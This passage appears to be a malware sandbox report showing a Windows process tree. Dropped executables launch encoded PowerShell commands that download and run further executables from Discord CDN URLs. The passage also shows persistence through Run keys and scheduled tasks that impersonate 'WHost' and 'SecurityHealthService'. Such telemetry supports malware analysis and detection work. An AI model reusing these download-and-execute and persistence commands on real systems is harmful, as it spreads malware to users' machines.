"C:\Users\Admin\AppData\Roaming\HJDS32.EXE"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4928

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3564

C:\Users\Admin\AppData\Local\Temp\0.exe
C:\Users\Admin\AppData\Local\Temp\0.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4300

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\3YxovXoRd8.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:4996

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\3wPKIsr8zP.exe
6⤵
PID:4988

C:\Users\Admin\AppData\Local\Temp\3wPKIsr8zP.exe
C:\Users\Admin\AppData\Local\Temp\3wPKIsr8zP.exe
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAegBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAyADYAMwAzADkAMAA5ADkAMAAzADYANgAvAFcASABvAHMAdAAuAGUAeABlACcALAAgADwAIwB0AGMAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AagB3ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAcAB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAdgBrAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgByAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAegBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAHgAagB1ACMAPgA="
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Users\Admin\AppData\Roaming\2.exe
"C:\Users\Admin\AppData\Roaming\2.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WHost' -Value '"C:\Users\Admin\AppData\Roaming\WHost\WHost.exe"' -PropertyType 'String'
10⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WHost /tr "C:\Users\Admin\AppData\Roaming\WHost\WHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:868

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WHost /tr "C:\Users\Admin\AppData\Roaming\WHost\WHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:3264

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
- Suspicious behavior: EnumeratesProcesses
PID:4544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:5044

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:4864

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\rPEgNxF7Ko.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:3924

C:\Users\Admin\AppData\Local\Temp\rPEgNxF7Ko.exe
C:\Users\Admin\AppData\Local\Temp\rPEgNxF7Ko.exe
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADAANgA5ADQANAA2ADQANwAxADkAMwAvAGwAbABpAHAAZQBkAGUAZQBkAGQALgBlAHgAZQAnACwAIAA8ACMAYQB6AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAHoAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAGoAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApACkAPAAjAHkAcgBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGoAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwBqAHMAcwAjAD4A"
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:192

C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:1652

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\Kg1Z9jLcrT.exe
6⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\Kg1Z9jLcrT.exe
C:\Users\Admin\AppData\Local\Temp\Kg1Z9jLcrT.exe
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAbgBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADEANwAzADkANgA4ADQAOAA3ADUAMQAvAFMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcALAAgADwAIwBpAHIAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAeABmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAdgBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAKQA8ACMAcQBmAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBiAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAeQByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAPAAjAGIAeABpACMAPgA="
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
PID:4024

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:4432

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:2268

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\eucbgdBgJM.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Users\Admin\AppData\Local\Temp\eucbgdBgJM.exe
C:\Users\Admin\AppData\Local\Temp\eucbgdBgJM.exe
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcwBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADMANAA2ADMANQA0ADQAMgAxADcANgAvAFcAaQBuAEYAbwByAG0ALgBlAHgAZQAnACwAIAA8ACMAeQB4AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAHYAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAHYAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AC4AZQB4AGUAJwApACkAPAAjAGIAbQBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHgAegBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAGkAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AC4AZQB4AGUAJwApADwAIwB6AHIAcwAjAD4A"
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Users\Admin\AppData\Roaming\5.exe
"C:\Users\Admin\AppData\Roaming\5.exe"
9⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Users\Admin\AppData\Roaming\5.exe
"C:\Users\Admin\AppData\Roaming\5.exe"
10⤵
- Executes dropped EXE
PID:5036

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\D0Z5QHdkzo.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:1488

C:\Users\Admin\AppData\Local\Temp\D0Z5QHdkzo.exe
C:\Users\Admin\AppData\Local\Temp\D0Z5QHdkzo.exe
7⤵
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAYwB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADYANQAxADkAOQAzADMANQA1ADUANQAvAG0AcABkAGkAaQBpAGwAcABvAGUALgBlAHgAZQAnACwAIAA8ACMAYgBnAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHEAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAGQAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApACkAPAAjAG0AcgB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAdgBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGYAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApADwAIwBtAHIAYwAjAD4A"
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Users\Admin\AppData\Roaming\6.exe
"C:\Users\Admin\AppData\Roaming\6.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4384

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:5072

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\T5PobisGaN.exe
6⤵
PID:3040

C:\Users\Admin\AppData\Local\Temp\T5PobisGaN.exe
C:\Users\Admin\AppData\Local\Temp\T5PobisGaN.exe
7⤵
- Executes dropped EXE
PID:2964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAaQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADcAMQA0ADgANgA2ADAAMQAyADUANgAvAFcAaQBuAGQAbwB3AHMARABpAHIAZQB4AHQALgBlAHgAZQAnACwAIAA8ACMAdQBkAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAGwAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAGcAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA3AC4AZQB4AGUAJwApACkAPAAjAGIAeQBlACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AZABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA3AC4AZQB4AGUAJwApADwAIwB5AGoAcQAjAD4A"
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Users\Admin\AppData\Roaming\7.exe
"C:\Users\Admin\AppData\Roaming\7.exe"
9⤵
- Executes dropped EXE
- Adds Run key to start application
PID:532

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\G6MrYvNp7T.exe
6⤵
PID:4552

C:\Users\Admin\AppData\Local\Temp\G6MrYvNp7T.exe
C:\Users\Admin\AppData\Local\Temp\G6MrYvNp7T.exe
7⤵
- Executes dropped EXE
PID:3376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAawBoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADkANgA1ADEAOAAyADEAMQA2ADAANAAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAG0AagBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBlAGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBsAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQApADwAIwBmAHMAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AGoAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBpAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQA8ACMAYgBpAHAAIwA+AA=="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Users\Admin\AppData\Roaming\8.exe
"C:\Users\Admin\AppData\Roaming\8.exe"
9⤵
- Executes dropped EXE
PID:2112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 772
10⤵
- Program crash
PID:4264

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\yOjeI1UPbZ.exe
6⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\yOjeI1UPbZ.exe
C:\Users\Admin\AppData\Local\Temp\yOjeI1UPbZ.exe
7⤵
- Executes dropped EXE
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADkANgA4ADUANwA5ADQANgAxADMAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGUAawB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABjAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB1AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQApADwAIwB2AHoAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGsAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZAByAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQA8ACMAcQBnAGIAIwA+AA=="
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Users\Admin\AppData\Roaming\9.exe
"C:\Users\Admin\AppData\Roaming\9.exe"
9⤵
- Executes dropped EXE
PID:4476

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\EWMQ2uDJM9.exe
6⤵
PID:4808

C:\Users\Admin\AppData\Local\Temp\EWMQ2uDJM9.exe
C:\Users\Admin\AppData\Local\Temp\EWMQ2uDJM9.exe
7⤵
- Executes dropped EXE
PID:1496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADQANgA5ADQANQA3ADEANQAwADAAMgA0AC8AbABjAG8AbQBwAGwAYwBtAHAAbwAuAGUAeABlACcALAAgADwAIwB5AGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AawB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAYQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMQAuAGUAeABlACcAKQApADwAIwBqAHYAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGwAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbAB2AGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAxAC4AZQB4AGUAJwApADwAIwB5AG4AdgAjAD4A"
8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4916

C:\Users\Admin\AppData\Roaming\11.exe
"C:\Users\Admin\AppData\Roaming\11.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
10⤵
PID:3844

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\nvAJS98aQD.exe
6⤵
PID:4952

C:\Users\Admin\AppData\Local\Temp\nvAJS98aQD.exe
C:\Users\Admin\AppData\Local\Temp\nvAJS98aQD.exe
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZABoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADUAMAA3ADUANQA4ADIAMQA1ADYAOAAwAC8AcABsAGwAbQBtAGQAaQBpAHAAbQAuAGUAeABlACcALAAgADwAIwB3AHoAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAcAB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAYQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMgAuAGUAeABlACcAKQApADwAIwBmAHQAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAGIAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB0AHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAyAC4AZQB4AGUAJwAp